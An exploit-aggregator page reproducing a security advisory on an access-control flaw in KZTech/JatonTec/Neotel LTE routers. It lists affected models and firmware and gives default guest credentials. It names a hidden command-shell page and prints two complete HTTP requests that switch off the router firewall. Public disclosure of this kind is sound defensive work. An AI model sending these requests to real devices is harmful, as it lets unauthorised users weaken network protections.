Exploit for KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Insecure Direct Object Reference

Name: Exploit for KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Insecure Direct Object Reference
Rating: 5 (254 reviews)
2021-03-19 | CVSS -0.6
## https://sploitus.com/exploit?id=PACKETSTORM:161886
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Improper Access Control (IDOR)  
  
  
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.  
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk  
http://www.jatontec.com/products/show.php?itemid=258  
http://www.jatontech.com/CAT12.html#_pp=105_564  
http://www.kzbtech.com/AM3300V.html  
https://neotel.mk/ostanati-paketi-2/  
  
Affected version: Model | Firmware  
-------|---------  
JT3500V | 2.0.1B1064  
JT3300V | 2.0.1B1047  
AM6200M | 2.0.0B3210  
AM6000N | 2.0.0B3042  
AM5000W | 2.0.0B3037  
AM4200M | 2.0.0B2996  
AM4100V | 2.0.0B2988  
AM3500MW | 2.0.0B1092  
AM3410V | 2.0.0B1085  
AM3300V | 2.0.0B1060  
AM3100E | 2.0.0B981  
AM3100V | 2.0.0B946  
AM3000M | 2.0.0B21  
KZ7621U | 2.0.0B14  
KZ3220M | 2.0.0B04  
KZ3120R | 2.0.0B01  
  
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi  
& VoIP CPE product specially designed to enable quick and easy  
LTE fixed data service deployment for residential and SOHO customers.  
It provides high speed LAN, Wi-Fi and VoIP integrated services  
to end users who need both bandwidth and multi-media data service  
in residential homes or enterprises. The device has 2 Gigabit LAN  
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and  
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing  
and firewall software for security. It provides an effective  
all-in-one solution to SOHO or residential customers. It can  
deliver up to 1Gbps max data throughput which can be very  
competitive to wired broadband access service.  
  
Desc: Insecure direct object references occur when an application  
provides direct access to objects based on user-supplied input. As  
a result of this vulnerability attackers can bypass authorization  
and access the hidden resources in the system and execute privileged  
functionalities.  
  
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Linux 2.6.36+ (mips)  
Mediatek APSoC SDK v4.3.1.0  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5640  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5640.php  
  
  
03.02.2021  
  
--  
  
  
The guest account user:user123 can navigate to /system_firewall.html page  
and disable the firewall. The guest account can access any page directly  
and modify the device.  
  
Or navigate to the hidden /lte/cmdshell.html page and execute LTE protocol  
stack commands.  
  
Ref: https://cwe.mitre.org/data/definitions/732.html  
  
Disable the firewall IDOR (newer models):  
-----------------------------------------  
  
POST /goform/set_sys_firewall HTTP/1.1  
Host: 192.168.1.1  
Connection: keep-alive  
Content-Length: 167  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: https://192.168.1.1  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://192.168.1.1/system_firewall.html  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b  
  
enableFirewall: 0  
pingFrmWANFilterEnabled: 0  
blockPortScanEnabled: 0  
blockSynFloodEnabled: 0  
spiFWEnabled: 1  
ftp_alg_enable_val: 1  
pptp_alg_enable_val: 1  
sip_alg_enable_val: 1  
  
  
Disable the firewall IDOR (older models):  
-----------------------------------------  
  
POST /goform/websSysFirewall HTTP/1.1  
Host: 192.168.1.1  
Connection: keep-alive  
Content-Length: 167  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Origin: http://192.168.1.1  
Referer: http://192.168.1.1/system_firewall.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cookie: kz_userid=admin:4540141  
  
enableFirewall: 0  
pingFrmWANFilterEnabled: 0  
blockPortScanEnabled: 0  
blockSynFloodEnabled: 0  
spiFWEnabled: 1  
ftp_alg_enable_val: 1  
pptp_alg_enable_val: 1  
sip_alg_enable_val: 1